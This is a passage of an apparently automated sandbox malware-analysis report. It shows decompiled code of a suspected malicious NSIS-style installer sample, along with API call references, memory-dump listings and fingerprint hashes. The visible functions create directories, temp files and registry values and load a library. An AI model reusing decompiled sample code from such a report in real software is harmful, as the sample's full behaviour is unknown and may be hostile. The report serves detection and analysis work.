				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                            0x00405a79
                                                                            0x00405a7d
                                                                            0x00405a80
                                                                            0x00405a86
                                                                            0x00405a8a
                                                                            0x00405a8e
                                                                            0x00405a96
                                                                            0x00405a9d
                                                                            0x00405aa3
                                                                            0x00405aaa
                                                                            0x00405ab1
                                                                            0x00405ab9
                                                                            0x00405abb
                                                                            0x00000000
                                                                            0x00405abb
                                                                            0x00405ac5
                                                                            0x00405acc
                                                                            0x00405ae2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405ae4
                                                                            0x00405ae8

                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                            • GetLastError.KERNEL32 ref: 00405AC5
                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                            • GetLastError.KERNEL32 ref: 00405AE4
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3449924974-3355392842
                                                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                            • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                            • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 713C1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 662 713c1817-713c1856 call 713c1bff 666 713c185c-713c1860 662->666 667 713c1976-713c1978 662->667 668 713c1869-713c1876 call 713c2480 666->668 669 713c1862-713c1868 call 713c243e 666->669 674 713c1878-713c187d 668->674 675 713c18a6-713c18ad 668->675 669->668 678 713c187f-713c1880 674->678 679 713c1898-713c189b 674->679 676 713c18cd-713c18d1 675->676 677 713c18af-713c18cb call 713c2655 call 713c1654 call 713c1312 GlobalFree 675->677 684 713c191e-713c1924 call 713c2655 676->684 685 713c18d3-713c191c call 713c1666 call 713c2655 676->685 701 713c1925-713c1929 677->701 682 713c1888-713c1889 call 713c2b98 678->682 683 713c1882-713c1883 678->683 679->675 680 713c189d-713c189e call 713c2e23 679->680 694 713c18a3 680->694 697 713c188e 682->697 689 713c1885-713c1886 683->689 690 713c1890-713c1896 call 713c2810 683->690 684->701 685->701 689->675 689->682 700 713c18a5 690->700 694->700 697->694 700->675 705 713c192b-713c1939 call 713c2618 701->705 706 713c1966-713c196d 701->706 712 713c193b-713c193e 705->712 713 713c1951-713c1958 705->713 706->667 708 713c196f-713c1970 GlobalFree 706->708 708->667 712->713 714 713c1940-713c1948 712->714 713->706 715 713c195a-713c1965 call 713c15dd 713->715 714->713 716 713c194a-713c194b FreeLibrary 714->716 715->706 716->713
                                                                            C-Code - Quality: 88%
                                                                            			E713C1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x713c506c = _a8;
				 *0x713c5070 = _a16;
				 *0x713c5074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x713c5048, E713C1651);
				_push(1);
				_t37 = E713C1BFF();
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E713C243E(_t54);
					}
					_push(_t54);
					E713C2480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E713C2655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E713C1666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E713C2655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E713C2655();
							_t37 = GlobalFree(E713C1312(E713C1654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E713C2618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E713C15DD( *0x713c5068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E713C2E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E713C2B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E713C2810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                            0x713c1817
                                                                            0x713c1817
                                                                            0x713c1817
                                                                            0x713c1824
                                                                            0x713c182c
                                                                            0x713c1839
                                                                            0x713c1847
                                                                            0x713c184a
                                                                            0x713c184c
                                                                            0x713c1851
                                                                            0x713c1856
                                                                            0x713c1978
                                                                            0x713c1978
                                                                            0x713c185c
                                                                            0x713c1860
                                                                            0x713c1863
                                                                            0x713c1868
                                                                            0x713c1869
                                                                            0x713c186a
                                                                            0x713c1870
                                                                            0x713c1876
                                                                            0x713c18a6
                                                                            0x713c18ad
                                                                            0x713c18d1
                                                                            0x713c191e
                                                                            0x713c191f
                                                                            0x713c18d3
                                                                            0x713c18d3
                                                                            0x713c18d4
                                                                            0x713c18dd
                                                                            0x713c18de
                                                                            0x713c18e8
                                                                            0x713c18eb
                                                                            0x713c18f0
                                                                            0x713c18f7
                                                                            0x713c18f7
                                                                            0x713c18fd
                                                                            0x713c18fe
                                                                            0x713c1904
                                                                            0x713c190a
                                                                            0x713c1917
                                                                            0x713c1918
                                                                            0x713c191b
                                                                            0x713c18af
                                                                            0x713c18af
                                                                            0x713c18b0
                                                                            0x713c18c5
                                                                            0x713c18c5
                                                                            0x713c1929
                                                                            0x713c192c
                                                                            0x713c1939
                                                                            0x713c1940
                                                                            0x713c1948
                                                                            0x713c194b
                                                                            0x713c194b
                                                                            0x713c1948
                                                                            0x713c1958
                                                                            0x713c1960
                                                                            0x713c1965
                                                                            0x713c1958
                                                                            0x713c196d
                                                                            0x00000000
                                                                            0x713c196f
                                                                            0x00000000
                                                                            0x713c1970
                                                                            0x713c196d
                                                                            0x713c187a
                                                                            0x713c187d
                                                                            0x713c189b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c189e
                                                                            0x713c18a3
                                                                            0x713c18a3
                                                                            0x713c18a5
                                                                            0x00000000
                                                                            0x713c18a5
                                                                            0x713c187f
                                                                            0x713c1880
                                                                            0x713c1888
                                                                            0x713c1889
                                                                            0x00000000
                                                                            0x713c1889
                                                                            0x713c1882
                                                                            0x713c1883
                                                                            0x713c1891
                                                                            0x00000000
                                                                            0x713c1891
                                                                            0x713c1886
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1886

                                                                            APIs
                                                                              • Part of subcall function 713C1BFF: GlobalFree.KERNEL32(?), ref: 713C1E74
                                                                              • Part of subcall function 713C1BFF: GlobalFree.KERNEL32(?), ref: 713C1E79
                                                                              • Part of subcall function 713C1BFF: GlobalFree.KERNEL32(?), ref: 713C1E7E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C18C5
                                                                            • FreeLibrary.KERNEL32(?), ref: 713C194B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C1970
                                                                              • Part of subcall function 713C243E: GlobalAlloc.KERNEL32(00000040,?), ref: 713C246F
                                                                              • Part of subcall function 713C2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,713C1896,00000000), ref: 713C28E0
                                                                              • Part of subcall function 713C1666: wsprintfW.USER32 ref: 713C1694
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                            • String ID:
                                                                            • API String ID: 3962662361-3916222277
                                                                            • Opcode ID: 6874092dda179c61d70ed431fcff42a9a9750950c63711e19e788dc961c12fba
                                                                            • Instruction ID: 7b202262028477fc522adec54db0ba6ef0dd75bd4032aab17588c9f72c6dab22
                                                                            • Opcode Fuzzy Hash: 6874092dda179c61d70ed431fcff42a9a9750950c63711e19e788dc961c12fba
                                                                            • Instruction Fuzzy Hash: 5641B472504306DBEB019F64D884FD63BBCBF05B5CF144465ED469A0CADBB4D886E7A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 719 40248a-4024bb call 402da6 * 2 call 402e36 726 4024c1-4024cb 719->726 727 402c2a-402c39 719->727 728 4024cd-4024da call 402da6 lstrlenW 726->728 729 4024de-4024e1 726->729 728->729 732 4024e3-4024f4 call 402d84 729->732 733 4024f5-4024f8 729->733 732->733 737 402509-40251d RegSetValueExW 733->737 738 4024fa-402504 call 4032b4 733->738 741 402522-402603 RegCloseKey 737->741 742 40251f 737->742 738->737 741->727 742->741
                                                                            C-Code - Quality: 83%
                                                                            			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}













                                                                            0x0040248a
                                                                            0x0040248a
                                                                            0x0040248a
                                                                            0x0040248a
                                                                            0x0040248d
                                                                            0x00402494
                                                                            0x0040249e
                                                                            0x004024a1
                                                                            0x004024aa
                                                                            0x004024b1
                                                                            0x004024b8
                                                                            0x004024bb
                                                                            0x004024c1
                                                                            0x004024cb
                                                                            0x004024cf
                                                                            0x004024da
                                                                            0x004024da
                                                                            0x004024e1
                                                                            0x004024eb
                                                                            0x004024f1
                                                                            0x004024f4
                                                                            0x004024f4
                                                                            0x004024f8
                                                                            0x00402504
                                                                            0x00402504
                                                                            0x00402515
                                                                            0x0040251d
                                                                            0x0040251f
                                                                            0x0040251f
                                                                            0x00402522
                                                                            0x004025fd
                                                                            0x004025fd
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000000,00000011,00000002), ref: 00402515
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValuelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nswCA44.tmp
                                                                            • API String ID: 2655323295-1613134589
                                                                            • Opcode ID: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                                                            • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                            • Opcode Fuzzy Hash: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                                                            • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 744 40605c-406068 745 406069-40609d GetTickCount GetTempFileNameW 744->745 746 4060ac-4060ae 745->746 747 40609f-4060a1 745->747 749 4060a6-4060a9 746->749 747->745 748 4060a3 747->748 748->749
                                                                            C-Code - Quality: 100%
                                                                            			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                            0x00406062
                                                                            0x00406068
                                                                            0x00406069
                                                                            0x00406069
                                                                            0x0040606e
                                                                            0x0040606f
                                                                            0x00406072
                                                                            0x00406077
                                                                            0x0040607a
                                                                            0x00406084
                                                                            0x00406091
                                                                            0x00406095
                                                                            0x0040609d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004060a1
                                                                            0x00000000
                                                                            0x004060a3
                                                                            0x004060a3
                                                                            0x004060a3
                                                                            0x004060a6
                                                                            0x004060a9
                                                                            0x004060a9
                                                                            0x004060ac
                                                                            0x00000000

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 0040607A
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-944333549
                                                                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                            • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                            • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 750 4015c1-4015d5 call 402da6 call 405eb7 755 401631-401634 750->755 756 4015d7-4015ea call 405e39 750->756 758 401663-4022f6 call 401423 755->758 759 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 755->759 763 401604-401607 call 405aeb 756->763 764 4015ec-4015ef 756->764 774 402c2a-402c39 758->774 759->774 776 40165b-40165e 759->776 773 40160c-40160e 763->773 764->763 767 4015f1-4015f8 call 405b08 764->767 767->763 780 4015fa-4015fd call 405a6e 767->780 778 401610-401615 773->778 779 401627-40162f 773->779 776->774 782 401624 778->782 783 401617-401622 GetFileAttributesW 778->783 779->755 779->756 785 401602 780->785 782->779 783->779 783->782 785->773
                                                                            C-Code - Quality: 86%
                                                                            			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                            0x004015c1
                                                                            0x004015c9
                                                                            0x004015cc
                                                                            0x004015d1
                                                                            0x004015d5
                                                                            0x004015d7
                                                                            0x004015df
                                                                            0x004015e1
                                                                            0x004015e4
                                                                            0x004015ea
                                                                            0x00401604
                                                                            0x00401607
                                                                            0x004015ec
                                                                            0x004015ec
                                                                            0x004015ef
                                                                            0x00000000
                                                                            0x004015fa
                                                                            0x004015fd
                                                                            0x004015fd
                                                                            0x004015ef
                                                                            0x0040160e
                                                                            0x00401615
                                                                            0x00401624
                                                                            0x00401624
                                                                            0x00401617
                                                                            0x0040161a
                                                                            0x00401622
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401622
                                                                            0x00401615
                                                                            0x00401627
                                                                            0x0040162b
                                                                            0x0040162c
                                                                            0x004015d7
                                                                            0x00401634
                                                                            0x00401663
                                                                            0x004022f1
                                                                            0x00401636
                                                                            0x00401638
                                                                            0x00401645
                                                                            0x0040164d
                                                                            0x00401655
                                                                            0x0040165b
                                                                            0x0040165b
                                                                            0x00401655
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                              • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                            • API String ID: 1892508949-670666241
                                                                            • Opcode ID: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                                                            • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                            • Opcode Fuzzy Hash: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                                                            • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 60%
                                                                            			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
